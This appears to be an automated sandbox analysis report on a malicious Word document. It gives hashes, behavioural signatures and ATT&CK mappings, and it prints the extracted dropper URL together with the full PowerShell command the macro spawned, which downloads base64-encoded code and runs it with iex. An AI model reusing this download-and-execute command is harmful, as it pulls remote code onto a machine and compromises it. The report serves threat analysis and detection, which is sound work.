Analysis

  • max time kernel
    248s
  • max time network
    252s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    01-12-2020 14:18

General

  • Target

    Downloads3/425895848735145103942784.doc

  • Size

    11.0MB

  • MD5

    a5bcfb89c89476bb2de69a52c0be5a35

  • SHA1

    c554019dd6f9ff674c92d0b153f0620e21efecb5

  • SHA256

    dc6a23a597caacf95adcba017b20909f48bb79a80e50fa00e4b496640199d8bc

  • SHA512

    13d07fbca3d6022ff2d1d630de7acdaac4c51daca52770c5007ce29deff6d0983af2e51d091fdd85cd09835f61cc78c70b4cc28dc23106158c54dcaa4371ad4f

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://dbi.dbimages.com/?need=negato0&vid=dpec22&42686

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Downloads3\425895848735145103942784.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ( [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( ((New-Object Net.WebClient).DownloadString('http://dbi.dbimages.com/?need=negato0&vid=dpec22&42686')) ) ) );
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4080

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/652-2-0x00007FFC2FF20000-0x00007FFC30557000-memory.dmp
    Filesize

    6.2MB

  • memory/4080-6-0x0000000000000000-mapping.dmp
  • memory/4080-7-0x00007FFC28F10000-0x00007FFC298FC000-memory.dmp
    Filesize

    9.9MB

  • memory/4080-8-0x000002A67B9B0000-0x000002A67B9B1000-memory.dmp
    Filesize

    4KB

  • memory/4080-9-0x000002A67C030000-0x000002A67C031000-memory.dmp
    Filesize

    4KB